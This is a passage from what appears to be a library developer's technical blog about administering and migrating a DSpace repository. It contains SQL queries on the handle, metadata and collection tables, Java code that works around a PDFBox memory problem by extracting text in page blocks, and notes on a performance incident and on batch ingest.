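    print(zombie_handles(from_handle_table, from_join))
```

When neither list contains duplicates, the size of the diff equals the difference of the two lengths, which matches the counts reported above (2425 - 2295 = 130 collections, 417 - 397 = 20 communities).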

Going from handles to metadata text value in Dspace

Handles that are items

DSPACE tables that map item handles to meta data text

The pdf below shows how the handle table connects to the metadata table for items. Item Handle to MetaData.pdf

sql to pull metadata for items

The query will pull all the metadata for handle value 30308 that is an item (resource_type_id=2).
select text_value from handle, metadatavalue where metadatavalue.item_id=handle.resource_id AND handle.resource_type_id=2 AND handle=30308;

Handles that are collections

DSPACE tables that map collection handles to meta data text

The pdf below shows how the handle table connects to the metadata table for collections. Note that for this to work we need to go through the collection table.
Collection Handle to MetaData.pdf

sql to pull metadata for collections

The query below will pull all of the metadata associated with the collection that has a handle of 37244.
select text_value from handle, collection, metadatavalue where metadatavalue.item_id=collection.template_item_id AND collection.collection_id=handle.resource_id AND handle.resource_type_id=3 AND handle=37244;

Handles that are communities

It looks like the communities do not map to meta data fields. The diagram below shows the connection between the handle and the community table, but I do not see how to link to the metadatavalue table.
Community Handle to MetaData.pdf

October 21, 2010

SQL to find DSPACE collection info given item handle

Collection name

Collection name for item handle 94921

SELECT collection.name FROM collection, collection2item, item, handle WHERE collection2item.item_id=item.item_id AND collection2item.collection_id=collection.collection_id AND handle.resource_id=item.item_id AND handle = 94921 ;

Collection handle

Collection handle for item handle 94921

SELECT handle FROM handle WHERE resource_type_id=3 AND resource_id=(SELECT collection.collection_id FROM collection, collection2item, item, handle WHERE collection2item.item_id=item.item_id AND collection2item.collection_id=collection.collection_id AND handle.resource_id=item.item_id AND handle = 94921) ;

October 12, 2010

examples of provenance field in DSPACE

When we move from DSPACE to drupal/fedora we will need to deal with the provenance field. Some examples:
 handle 	                            Provenance
36676	 Made available in DSpace on 2007-03-07T16:00:37Z (GMT). No. of bitstreams: 1 sp02fe01.pdf: 51451 bytes, checksum: 6731d24ea9ea1130f75f334af1254c47 (MD5)   Previous issue date: 2002
36675	 Made available in DSpace on 2007-03-07T16:00:37Z (GMT). No. of bitstreams: 1 sp02fe01.pdf: 51451 bytes, checksum: 6731d24ea9ea1130f75f334af1254c47 (MD5)   Previous issue date: 2002
36674	 Made available in DSpace on 2007-03-07T16:00:37Z (GMT). No. of bitstreams: 1 sp02fe01.pdf: 51451 bytes, checksum: 6731d24ea9ea1130f75f334af1254c47 (MD5)   Previous issue date: 2002
36673	 Made available in DSpace on 2007-03-07T16:00:39Z (GMT). No. of bitstreams: 1 sp02in01.pdf: 38798 bytes, checksum: c50744342b737b0150f9e7daba133471 (MD5)   Previous issue date: 2002
36672	 Made available in DSpace on 2007-03-07T16:00:39Z (GMT). No. of bitstreams: 1 sp02in01.pdf: 38798 bytes, checksum: c50744342b737b0150f9e7daba133471 (MD5)   Previous issue date: 2002
36671	 Made available in DSpace on 2007-03-07T16:00:39Z (GMT). No. of bitstreams: 1 sp02in01.pdf: 38798 bytes, checksum: c50744342b737b0150f9e7daba133471 (MD5)   Previous issue date: 2002
36670	 Made available in DSpace on 2007-03-07T16:00:40Z (GMT). No. of bitstreams: 1 sp02cl01.pdf: 220515 bytes, checksum: fc81cbb5e1d3ff157bc1ec8ee07142b1 (MD5)   Previous issue date: 2002
36669	 Made available in DSpace on 2007-03-07T16:00:40Z (GMT). No. of bitstreams: 1 sp02cl01.pdf: 220515 bytes, checksum: fc81cbb5e1d3ff157bc1ec8ee07142b1 (MD5)   Previous issue date: 2002
36668	 Made available in DSpace on 2007-03-07T16:00:40Z (GMT). No. of bitstreams: 1 sp02cl01.pdf: 220515 bytes, checksum: fc81cbb5e1d3ff157bc1ec8ee07142b1 (MD5)   Previous issue date: 2002
36667	 Made available in DSpace on 2007-03-07T16:00:41Z (GMT). No. of bitstreams: 1 sp02de01.pdf: 43516 bytes, checksum: b2c54432266049e04b14a9e5e6a4c6df (MD5)   Previous issue date: 2002
36666	 Made available in DSpace on 2007-03-07T16:00:41Z (GMT). No. of bitstreams: 1 sp02de01.pdf: 43516 bytes, checksum: b2c54432266049e04b14a9e5e6a4c6df (MD5)   Previous issue date: 2002
36665	 Made available in DSpace on 2007-03-07T16:00:41Z (GMT). No. of bitstreams: 1 sp02de01.pdf: 43516 bytes, checksum: b2c54432266049e04b14a9e5e6a4c6df (MD5)   Previous issue date: 2002
36664	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02fl01.pdf: 89644 bytes, checksum: 4c353f2db94dde10910d36d3610ac68e (MD5)   Previous issue date: 2002
36663	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02fl01.pdf: 89644 bytes, checksum: 4c353f2db94dde10910d36d3610ac68e (MD5)   Previous issue date: 2002
36662	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02fl01.pdf: 89644 bytes, checksum: 4c353f2db94dde10910d36d3610ac68e (MD5)   Previous issue date: 2002
36661	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02ba02.pdf: 149756 bytes, checksum: eb35a6d44da3a3645a71315c46c419bf (MD5)   Previous issue date: 2002
36660	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02ba02.pdf: 149756 bytes, checksum: eb35a6d44da3a3645a71315c46c419bf (MD5)   Previous issue date: 2002
36659	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02ba02.pdf: 149756 bytes, checksum: eb35a6d44da3a3645a71315c46c419bf (MD5)   Previous issue date: 2002
36658	 Made available in DSpace on 2007-03-07T16:00:43Z (GMT). No. of bitstreams: 1 sp02up01.pdf: 542678 bytes, checksum: a06c46cbfda686890c712bf5de083026 (MD5)   Previous issue date: 2002
36657	 Made available in DSpace on 2007-03-07T16:00:43Z (GMT). No. of bitstreams: 1 sp02up01.pdf: 542678 bytes, checksum: a06c46cbfda686890c712bf5de083026 (MD5)   Previous issue date: 2002
36656	 Made available in DSpace on 2007-03-07T16:00:43Z (GMT). No. of bitstreams: 1 sp02up01.pdf: 542678 bytes, checksum: a06c46cbfda686890c712bf5de083026 (MD5)   Previous issue date: 2002
36655	 Made available in DSpace on 2007-03-07T16:00:44Z (GMT). No. of bitstreams: 1 sp02ho01.pdf: 149243 bytes, checksum: 2db5cfebc10b0cd148ce1e06e2149851 (MD5)   Previous issue date: 2002
36654	 Made available in DSpace on 2007-03-07T16:00:44Z (GMT). No. of bitstreams: 1 sp02ho01.pdf: 149243 bytes, checksum: 2db5cfebc10b0cd148ce1e06e2149851 (MD5)   Previous issue date: 2002
36653	 Made available in DSpace on 2007-03-07T16:00:44Z (GMT). No. of bitstreams: 1 sp02ho01.pdf: 149243 bytes, checksum: 2db5cfebc10b0cd148ce1e06e2149851 (MD5)   Previous issue date: 2002
36652	 Made available in DSpace on 2007-03-07T16:00:45Z (GMT). No. of bitstreams: 1 sp02va01.pdf: 102387 bytes, checksum: cb7f7c54b0b7713a7e8df1ee749db762 (MD5)   Previous issue date: 2002
36651	 Made available in DSpace on 2007-03-07T16:00:45Z (GMT). No. of bitstreams: 1 sp02va01.pdf: 102387 bytes, checksum: cb7f7c54b0b7713a7e8df1ee749db762 (MD5)   Previous issue date: 2002
36650	 Made available in DSpace on 2007-03-07T16:00:45Z (GMT). No. of bitstreams: 1 sp02va01.pdf: 102387 bytes, checksum: cb7f7c54b0b7713a7e8df1ee749db762 (MD5)   Previous issue date: 2002
36649	 Made available in DSpace on 2007-03-07T16:00:46Z (GMT). No. of bitstreams: 1 sp02sh01.pdf: 188489 bytes, checksum: bff2872ec0b4de423a55bc5684796153 (MD5)   Previous issue date: 2002
36648	 Made available in DSpace on 2007-03-07T16:00:46Z (GMT). No. of bitstreams: 1 sp02sh01.pdf: 188489 bytes, checksum: bff2872ec0b4de423a55bc5684796153 (MD5)   Previous issue date: 2002
36647	 Made available in DSpace on 2007-03-07T16:00:46Z (GMT). No. of bitstreams: 1 sp02sh01.pdf: 188489 bytes, checksum: bff2872ec0b4de423a55bc5684796153 (MD5)   Previous issue date: 2002

provenance.xls

September 1, 2010

Distinct values for language in AgEcon

Type of language metadata fields in DSPACE

 metadata_field_id | metadata_schema_id |   element   |         qualifier         
-------------------+--------------------+-------------+---------------------------
                37 |                  1 | language    | 
                38 |                  1 | language    | iso

language field (metadata_field_id = 37)

Total count:
sql: select count( text_value) from metadatavalue where metadata_field_id=37;
Count: 27538

Distinct values
sql: select DISTINCT text_value from metadatavalue where metadata_field_id=37 ;

Afrikaans
Chinese
Danish
Dutch
English
French
German
Hungarian
Japanese
Spanish
(10 rows)

language iso field (metadata_field_id = 38)

Total count:
sql: select count( text_value) from metadatavalue where metadata_field_id=38;
Count: 41971

Distinct values
sql: select DISTINCT text_value from metadatavalue where metadata_field_id=38 ;

af
da
de
Dutch
en
en_US
es
fr
French
it
nl
other
sp
SP
Spanish
zh
(16 rows)
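Clearly some non-ISO values have slipped in: the full names Dutch, French and Spanish, the placeholder other, and sp/SP (the ISO 639-1 code for Spanish is es).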
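
A minimal sketch of how the stray values could be mapped back onto two-letter codes before any clean-up UPDATE is written. The class and method names are hypothetical and not part of DSpace, and treating sp/SP as Spanish is an assumption that should be checked against the items themselves. Values with no known fix (for example other or en_US) are passed through unchanged.

```java
import java.util.HashMap;
import java.util.Locale;
import java.util.Map;

// Hypothetical helper, not part of DSpace: maps the stray values seen in
// metadata_field_id = 38 onto two-letter ISO 639-1 codes.
class LanguageIsoNormalizer {

    private static final Map<String, String> FIXES = new HashMap<String, String>();
    static {
        FIXES.put("dutch", "nl");
        FIXES.put("french", "fr");
        FIXES.put("spanish", "es");
        FIXES.put("sp", "es"); // assumption: "sp" and "SP" were meant as Spanish
    }

    /** Returns the corrected code, or the input unchanged when no fix is known. */
    static String normalize(String value) {
        if (value == null) {
            return null;
        }
        String key = value.trim().toLowerCase(Locale.ROOT);
        String fixed = FIXES.get(key);
        return fixed != null ? fixed : value;
    }

    public static void main(String[] args) {
        String[] samples = {"Dutch", "SP", "en_US", "other"};
        for (String s : samples) {
            System.out.println(s + " -> " + normalize(s));
        }
    }
}
```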

July 15, 2010

Excel files to be derived from dspace to go into Drupal

We are going to extract the guts from dspace and put them into Drupal. Here are the various excel spreadsheets that must be created.
parent_type
0 - no parent
1 - collection
2 - community


items
metadata 1  ... metadata n parent_type parent_id

communities

     Column       |          Type          | Modifiers 
-------------------+------------------------+-----------
 community_id      | integer                | not null
 name              | character varying(128) | 
 short_description | character varying(512) | 
 introductory_text | text                   | 
 logo_bitstream_id | integer                | 
 copyright_text    | text                   | 
 side_bar_text     | text                   |    <---- Blank

Excel community file
community_id name short_description introductory_text parent_type parent_id has_child
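
A rough sketch of how one row of the community file above might be produced. It writes tab-separated text as a stand-in for a real Excel writer, and every name in it is hypothetical. Writing has_child as 1 or 0 is an assumption, and text values that themselves contain tabs or line breaks would need extra handling. The parent type codes are the 0/1/2 values listed at the top of this entry.

```java
// Hypothetical sketch: names are illustrative, not taken from DSpace or Drupal.
class ExportRows {

    /** Codes for the kind of parent: 0 no parent, 1 collection, 2 community. */
    enum ParentType {
        NONE(0), COLLECTION(1), COMMUNITY(2);

        final int code;

        ParentType(int code) {
            this.code = code;
        }
    }

    /** Joins the cells of one row with tabs, writing null as an empty cell. */
    static String row(Object... cells) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < cells.length; i++) {
            if (i > 0) {
                sb.append('\t');
            }
            if (cells[i] != null) {
                sb.append(cells[i]);
            }
        }
        return sb.toString();
    }

    /** One line of the community file, in the column order listed above. */
    static String communityRow(int communityId, String name, String shortDescription,
                               String introductoryText, ParentType parentType,
                               int parentId, boolean hasChild) {
        // assumption: has_child is written as 1 or 0
        return row(communityId, name, shortDescription, introductoryText,
                   parentType.code, parentId, hasChild ? 1 : 0);
    }

    public static void main(String[] args) {
        System.out.println(communityRow(5, "AgEcon", null, "", ParentType.NONE, 0, true));
    }
}
```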


collections:


                  Table "public.collection"
         Column         |          Type          | Modifiers 
------------------------+------------------------+-----------
 collection_id          | integer                | not null
 name                   | character varying(128) | 
 short_description      | character varying(512) | 
 introductory_text      | text                   | 
 logo_bitstream_id      | integer                | 
 template_item_id       | integer                |   <--- not all filled
 provenance_description | text                   |   <--- blank
 license                | text                   | 
 copyright_text         | text                   | 
 side_bar_text          | text                   | 
 workflow_step_1        | integer                | <--- not all filled
 workflow_step_2        | integer                | <--- not all filled
 workflow_step_3        | integer                | 
 submitter              | integer                | <--- eperson_group_id
 admin                  | integer                | <--- eperson_group_id

Excel collection file
collection_id name short_description introductory_text parent_type submitter_group_id admin_group_id parent_id has_child




dspace_ir=> \d eperson;
                    Table "public.eperson"
       Column        |            Type             | Modifiers 
---------------------+-----------------------------+-----------
 eperson_id          | integer                     | not null
 email               | character varying(64)       | 
 password            | character varying(64)       | 
 firstname           | character varying(64)       | 
 lastname            | character varying(64)       | 
 can_log_in          | boolean                     |  <-- all of these are true
 require_certificate | boolean                     |  <-- all of these are false
 self_registered     | boolean                     |  <-- blanks and false
 last_active         | timestamp without time zone | 
 sub_frequency       | integer                     |  <-- blank
 phone               | character varying(32)       | 
 netid               | character varying(64)       | 



dspace_ir=> \d epersongroup;
      Column      |          Type          | Modifiers 
------------------+------------------------+-----------
 eperson_group_id | integer                | not null    <-- admin or submitter
 name             | character varying(256) | 

dspace_ir=> \d epersongroup2eperson;
  Table "public.epersongroup2eperson"
      Column      |  Type   | Modifiers 
------------------+---------+-----------
 id               | integer | not null
 eperson_group_id | integer | 
 eperson_id       | integer | 


dspace_ir=> select * from  epersongroup2workspaceitem ;
 id | eperson_group_id | workspace_item_id 
----+------------------+-------------------
(0 rows)



3 excel tables
eperson
eperson_id firstname lastname phone netid

group 
eperson_group_id name

eperson2group
eperson_group_id eperson_id

July 14, 2010

List of bitstream_format_id and mimetypes for DSPACE


 bitstream_format_id |           mimetype            |  short_description   |                             description                              | support_level | internal 
---------------------+-------------------------------+----------------------+----------------------------------------------------------------------+---------------+----------
                   1 | application/octet-stream      | Unknown              | Unknown data format                                                  |             0 | f
                   2 | text/plain                    | License              | Item-specific license agreed upon to submission                      |             1 | t
                   3 | application/pdf               | PDF                  | Adobe Portable Document Format                                       |             1 | f
                   4 | text/xml                      | XML                  | Extensible Markup Language                                           |             1 | f
                   5 | text/plain                    | Text                 | Plain Text                                                           |             1 | f
                   6 | text/html                     | HTML                 | Hypertext Markup Language                                            |             1 | f
                   7 | text/css                      | CSS                  | Cascading Style Sheets                                               |             1 | f
                   8 | application/msword            | Microsoft Word       | Microsoft Word                                                       |             1 | f
                   9 | application/vnd.ms-powerpoint | Microsoft Powerpoint | Microsoft Powerpoint                                                 |             1 | f
                  10 | application/vnd.ms-excel      | Microsoft Excel      | Microsoft Excel                                                      |             1 | f
                  11 | application/marc              | MARC                 | Machine-Readable Cataloging records                                  |             1 | f
                  12 | image/jpeg                    | JPEG                 | Joint Photographic Experts Group/JPEG File Interchange Format (JFIF) |             1 | f
                  13 | image/gif                     | GIF                  | Graphics Interchange Format                                          |             1 | f
                  14 | image/png                     | image/png            | Portable Network Graphics                                            |             1 | f
                  15 | image/tiff                    | TIFF                 | Tag Image File Format                                                |             1 | f
                  16 | audio/x-aiff                  | AIFF                 | Audio Interchange File Format                                        |             1 | f
                  17 | audio/basic                   | audio/basic          | Basic Audio                                                          |             1 | f
                  18 | audio/x-wav                   | WAV                  | Broadcase Wave Format                                                |             1 | f
                  19 | video/mpeg                    | MPEG                 | Moving Picture Experts Group                                         |             1 | f
                  20 | text/richtext                 | RTF                  | Rich Text Format                                                     |             1 | f
                  21 | application/vnd.visio         | Microsoft Visio      | Microsoft Visio                                                      |             1 | f
                  22 | application/x-filemaker       | FMP3                 | Filemaker Pro                                                        |             1 | f
                  23 | image/x-ms-bmp                | BMP                  | Microsoft Windows bitmap                                             |             1 | f
                  24 | application/x-photoshop       | Photoshop            | Photoshop                                                            |             1 | f
                  25 | application/postscript        | Postscript           | Postscript Files                                                     |             1 | f
                  26 | video/quicktime               | Video Quicktime      | Video Quicktime                                                      |             1 | f
                  27 | audio/x-mpeg                  | MPEG Audio           | MPEG Audio                                                           |             1 | f
                  28 | application/vnd.ms-project    | Microsoft Project    | Microsoft Project                                                    |             1 | f
                  29 | application/mathematica       | Mathematica          | Mathematica Notebook                                                 |             1 | f
                  30 | application/x-latex           | LateX                | LaTeX document                                                       |             1 | f
                  31 | application/x-tex             | TeX                  | Tex/LateX document                                                   |             1 | f
                  32 | application/x-dvi             | TeX dvi              | TeX dvi format                                                       |             1 | f
                  33 | application/sgml              | SGML                 | SGML application (RFC 1874)                                          |             1 | f
                  34 | application/wordperfect5.1    | WordPerfect          | WordPerfect 5.1 document                                             |             1 | f
                  35 | audio/x-pn-realaudio          | RealAudio            | RealAudio file                                                       |             1 | f
                  36 | image/x-photo-cd              | Photo CD             | Kodak Photo CD image                                                 |             1 | f
                  37 | text/plain                    | tfw                  | ArcView World File For TIF Image                                     |             0 | f
                  38 | text/plain                    | e00                  | ArcInfo Coverage Export                                              |             0 | f
(38 rows)

Workaround for a problem with PDFBox text extraction

The problem

When PDFBox was used to extract text from a file of about 20 MB, it would chew up more and more memory and eventually drag the system down to a standstill.

The workaround

I used the methods setStartPage and setEndPage in the PDFTextStripper class to limit the number of pages converted to text at a time.
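
The page arithmetic behind this can be sketched on its own, without PDFBox. PDFTextStripper counts pages from 1 and treats the end page as inclusive, so consecutive blocks have to be 1-50, 51-100 and so on, with the last block clipped to the page count. The class below is a hypothetical helper that only computes the ranges; each pair would then be passed to setStartPage and setEndPage.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper: computes the page ranges to hand to
// PDFTextStripper.setStartPage / setEndPage.
class PageBlocks {

    /** Returns {startPage, endPage} pairs, 1-based and inclusive, covering 1..pageCount. */
    static List<int[]> blocks(int pageCount, int blockSize) {
        if (blockSize < 1) {
            throw new IllegalArgumentException("blockSize must be at least 1");
        }
        List<int[]> result = new ArrayList<int[]>();
        for (int start = 1; start <= pageCount; start += blockSize) {
            // clip the final block so it never runs past the last page
            int end = Math.min(start + blockSize - 1, pageCount);
            result.add(new int[] {start, end});
        }
        return result;
    }

    public static void main(String[] args) {
        for (int[] b : blocks(1959, 50)) {
            System.out.println(b[0] + "-" + b[1]);
        }
    }
}
```

No page is visited twice and no separate pass is needed for the pages left over at the end.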

Results of a run

Extracting text
NumberPagesInPDF 1959
Extraction time seconds 230
Pages per second 8.5 (1959 pages / 230 seconds)
Number of characters extracted 672324
For the number of pages per text extraction I tried 20, 50 and 100 pages and the results were similar. This rate seems very slow.

Specs on computer used

The run above was done on odin.lib.umn.edu. Here is some information on it:

cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 15
model : 4
model name : Intel(R) Pentium(R) 4 CPU 3.20GHz
stepping : 3
cpu MHz : 3200.166
cache size : 2048 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 5
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr
bogomips : 6404.36
clflush size : 64
processor : 1
vendor_id : GenuineIntel
cpu family : 15
model : 4
model name : Intel(R) Pentium(R) 4 CPU 3.20GHz
stepping : 3
cpu MHz : 3200.166
cache size : 2048 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 5
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr
bogomips : 6400.17
clflush size : 64

free -m (without pdfbox running)
             total       used       free     shared    buffers     cached
Mem:          2018       1428        590          0        229       1045
-/+ buffers/cache:        153       1865
Swap:         3812         31       3781

Code sample

I rewrote the getDestinationStream method in the DSPACE class PDFFilter to extract text in blocks of 50 pages. The new version of the method is given below:

    public InputStream getDestinationStream(InputStream source) throws Exception {

        System.out.println("Extracting text");

        long startTime = System.currentTimeMillis();
        // get input stream from bitstream
        // pass to filter, get string back
        PDFTextStripper textExtractor = new PDFTextStripper();
        PDFParser parser = null;
        // accumulate in a StringBuilder rather than with String +=
        StringBuilder extractedText = new StringBuilder(" ");
        int numberPagesInPDF = 0;
        try
        {
            parser = new PDFParser(source);
            parser.parse();

            int sizeOfPDFSection = 50;
            PDDocument pdfToExtract = new PDDocument(parser.getDocument());
            numberPagesInPDF = pdfToExtract.getNumberOfPages();

            // PDFTextStripper counts pages from 1 and treats the end page as
            // inclusive, so consecutive blocks are 1-50, 51-100, ... The last
            // block is clipped to the page count, so no catch-up pass is needed
            // and no page is extracted twice.
            for (int startPage = 1; startPage <= numberPagesInPDF; startPage += sizeOfPDFSection)
            {
                int endPage = Math.min(startPage + sizeOfPDFSection - 1, numberPagesInPDF);
                textExtractor.setStartPage( startPage );
                textExtractor.setEndPage( endPage );
                extractedText.append(textExtractor.getText(pdfToExtract));
            }
        }
        finally
        {
            try
            {
                // parser is still null if the PDFParser constructor threw
                if (parser != null && parser.getDocument() != null)
                {
                    parser.getDocument().close();
                }
            }
            catch(Exception e)
            {
               log.error("Error closing temporary PDF file: " + e.getMessage(), e);
            }
        }

        String text = extractedText.toString();

        // if verbose flag is set, print out extracted text
        // to STDOUT
        if (MediaFilterManager.isVerbose)
        {
            System.out.println(text);
        }

        // generate an input stream with the extracted text
        long stopTime = System.currentTimeMillis();
        long deltaSeconds = (stopTime-startTime)/1000;
        System.out.println(" NumberPagesInPDF " + numberPagesInPDF);
        System.out.println("Extraction time seconds " + deltaSeconds );
        System.out.println("Pages per second "  + (double)numberPagesInPDF/(double)deltaSeconds  );
        System.out.println(" Number of characters extracted " + text.length());
        byte[] textBytes = text.getBytes();
        // The stream keeps its own reference to textBytes, so the array stays
        // alive after this method returns.
        return new ByteArrayInputStream(textBytes);
    }
}

                              
                              
                           

June 15, 2010

Possible solution to large sets of PDFs not being indexed.

1) Currently all the bitstreams for all the pdfs are being read into memory by DSPACE before indexing starts.

2) General idea: make an array of bitstream.internal_id and produce file names from these. Open them one at a time, as files and process them. There will have to be an if to catch PDF filters. A new version of the processBitstream method will have to be written in the MediaFilter.java class.
3) Determine if a filter is PDF. In MediaFilterManager the line:

filterClasses[i].getClass().getName()
produces a String of the form:
org.dspace.app.mediafilter.PDFFilter

4) In Bundle.java is an example of a database query in DSPACE:

TableRowIterator tri = DatabaseManager.queryTable( ourContext, "bitstream", "SELECT bitstream.* FROM bitstream, bundle2bitstream WHERE " + "bundle2bitstream.bitstream_id=bitstream.bitstream_id AND " + "bundle2bitstream.bundle_id= ? ", bundleRow.getIntColumn("bundle_id"));
5) A query that will get the bitstream.internal_id from the handle:

select handle.handle,bitstream.internal_id from handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and bundle2bitstream.bitstream_id = bitstream.bitstream_id and bitstream.name ~ '^.*pdf$' order by handle::text::integer;

6) The SQL query produces output like this:

handle | internal_id
--------+-----------------------------------------
4 | 21235899611297801355164539089367487918
6 | 107336362058605133394783483256748994425
7 | 11090457400765004032181753363050906238
8 | 15085152857357519261000291360441738392
9 | 107871098203799408458667072002741710893
11 | 50276060641731470155592232786626559701
12 | 65101419339422847404612669026873496384
13 | 43890973756880840755046786472676911568
15 | 160770701110516817178377325959276903855
16 | 65016360752601910182437228650469824124
7) Finding the handle

int Handle = Integer.parseInt(myItem.getHandle());
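
Steps 2 and 3 can be sketched as two small helpers. The path layout is an assumption: it follows what I understand to be the standard DSpace asset store scheme, in which the first three pairs of digits of the internal_id name three nested directories. That should be verified against the local assetstore before relying on it. The class and method names are hypothetical.

```java
// Hypothetical helpers for steps 2 and 3; not part of DSpace.
class AssetStorePaths {

    // assumption: standard DSpace layout, three directory levels of two digits each
    private static final int DIGITS_PER_LEVEL = 2;
    private static final int DIRECTORY_LEVELS = 3;

    /** Builds the path of a bitstream file relative to the asset store root. */
    static String relativePath(String internalId) {
        if (internalId == null || internalId.length() < DIGITS_PER_LEVEL * DIRECTORY_LEVELS) {
            throw new IllegalArgumentException("internal_id is too short: " + internalId);
        }
        StringBuilder path = new StringBuilder();
        for (int level = 0; level < DIRECTORY_LEVELS; level++) {
            int from = level * DIGITS_PER_LEVEL;
            path.append(internalId, from, from + DIGITS_PER_LEVEL).append('/');
        }
        return path.append(internalId).toString();
    }

    /** Step 3: true when the class name from getClass().getName() is the PDF filter. */
    static boolean isPdfFilter(String filterClassName) {
        return "org.dspace.app.mediafilter.PDFFilter".equals(filterClassName);
    }

    public static void main(String[] args) {
        System.out.println(relativePath("21235899611297801355164539089367487918"));
    }
}
```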

June 11, 2010

PDF files that are not being indexed SQL to look at the issue

The problem

Beth found that the item with handle 56385 http://conservancy.umn.edu/handle/56385 had not gone through the full text indexer.
The command
/dspace/dspace-ir/bin/filter-media -i 56385
will index just that one item. Here is the error message that you get:
ErrorMediaFilter
This error message indicates that the error is coming from the third party jar: PDFBox.jar.

Some SQL

Below is an SQL query that pulls out all of the files that are pdfs in the repository:
select handle.handle,bitstream.name, bitstream.description from handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and bundle2bitstream.bitstream_id = bitstream.bitstream_id and bitstream.name ~ '^.*pdf$' order by handle::text::integer;

Next is an SQL query that finds all the PDFs that have been indexed:
select handle.handle,bitstream.name, bitstream.description from handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and bundle2bitstream.bitstream_id = bitstream.bitstream_id and bitstream.description = 'Extracted text' order by handle::text::integer;

Current number of unindexed files

# PDFs - 14477
# Indexed - 13252

# Unindexed - 1225

May 5, 2010

SQL: extracting the purl and title from dspace given a handle

dspace_sr=> select text_value from metadatavalue, handle where metadata_field_id=25 AND item_id=handle.resource_id and handle=49928;

text_value
---------------------------
http://purl.umn.edu/49928
dspace_sr=> select text_value from metadatavalue, handle where metadata_field_id=64 AND item_id=handle.resource_id and handle=49928;

text_value
-------------------------------------------------------------------------------------------
Food-safety Standards and Farmers Health: Evidence from Kenyan’s Export Vegetable Growers

May 4, 2010

DSPACE performance problem traced to file of indices missing

Summary sent to users

For the last 25 - 30 hours there have been major troubles on the AgEcon side. It turns out that the file containing all the data from the index-all run was missing. Lacking this file produced a large number of bizarre and severe problems. I have run index-all on the AgEcon side and the system now seems to be OK. I can only guess that the last index-all failed and the file was not created. Several parts of the system rely on this file and failed. I am curious: how much trouble did you see on the UDC side?

Symptoms

Spikes to over 100% cpu usage on both strip1 (tomcat) and strip3 (postgres) boxes
search fails
browse fails
epeople could not be created
input form fails after being partially filled out
bouncing tomcat and postgres produced only minutes of proper behavior

Some technical details

The file:
/dspace/assetstore/dspace-sr/search/segments
was missing. One of the error messages pointed to this problem. This file is the output of the indexer.
I ran the command to reindex the metadata:

dsrun org.dspace.search.DSIndexer -c &

As soon as the command above started, the users could enter upload files and do searches. It has been about six hours since the metadata was indexed and all seems well.

eperson table

Initially I thought the problem might be in the eperson table. I do not believe that this is the case. There were 2003 epeople and I found three that were clearly flawed.

Here is what we want an eperson to look like:

                    Table "public.eperson"
       Column        |            Type             | Modifiers 
---------------------+-----------------------------+-----------
 eperson_id          | integer                     | not null
 email               | character varying(64)       | 
 password            | character varying(64)       | 
 firstname           | character varying(64)       | 
 lastname            | character varying(64)       | 
 can_log_in          | boolean                     | 
 require_certificate | boolean                     | 
 self_registered     | boolean                     | 
 last_active         | timestamp without time zone | 
 sub_frequency       | integer                     | 
 phone               | character varying(32)       | 
 netid               | character varying(64)       | 
Indexes:
    "eperson_pkey" primary key, btree (eperson_id)
    "eperson_email_key" unique, btree (email)
    "eperson_email_idx" btree (email)
    "eperson_netid_idx" btree (netid)

The three flawed epeople were missing passwords and other critical fields. They were all deleted:
426 | newuser426 | | | | | | | | |
93 | newuser93 | | | | | | | | |
486 | aaea@umn.edu | | Registration | aaea09 | t | f | | | |

cpu performance plots

The problem happened on May 3 and into May 4. strip1-cpu.tiff strip3-cpu.tiff Raw cpu data

Some commands found along the way

get postgres processes

PostgreSQL equivalent of MySQL's 'SHOW PROCESSLIST':
SELECT * FROM pg_stat_activity;

April 27, 2010

Batch Ingest into DSPACE based on EXCEL

Introduction

Below is a procedure for ingesting data into DSPACE based on Excel. Basically the user supplies a zip file that contains an Excel file with the metadata and a subdirectory with the assets. This is converted into subdirectories, each holding the DC XML and the corresponding asset, that can be consumed by the DSPACE ingest system. Finally a perl script calls the ItemImport class and all the metadata and assets are ingested.
ExcelBatchIngest.jpg

Files

DCBatch.java.html
batch_ingest.pl.html
Sample Excel file
IngestMetaData.xls

December 11, 2009

DSPACE metadata and Google scholar

From an email Julie sent

I came across this info on some DSpace list, and thought it might help our cause with getting GS to better index AgEcon and the UDC: "Providing metatags used by Google Scholar for enhanced indexing". Maybe it's old news to those in the know. I was rummaging around looking for info about DSpace and Zotero.

I checked the link and there is a desire for DSPACE to provide this out of the box.

Links on the subject

Nature's Metadata for Web Pages
Below is the standard for putting metadata in html.
Expressing Dublin Core metadata using HTML/XHTML meta and link elements

Difficult to improve standing

From Publish or Perish Frequently Asked Questions

Other results issues

How do I improve the accuracy with which Google Scholar lists my papers?

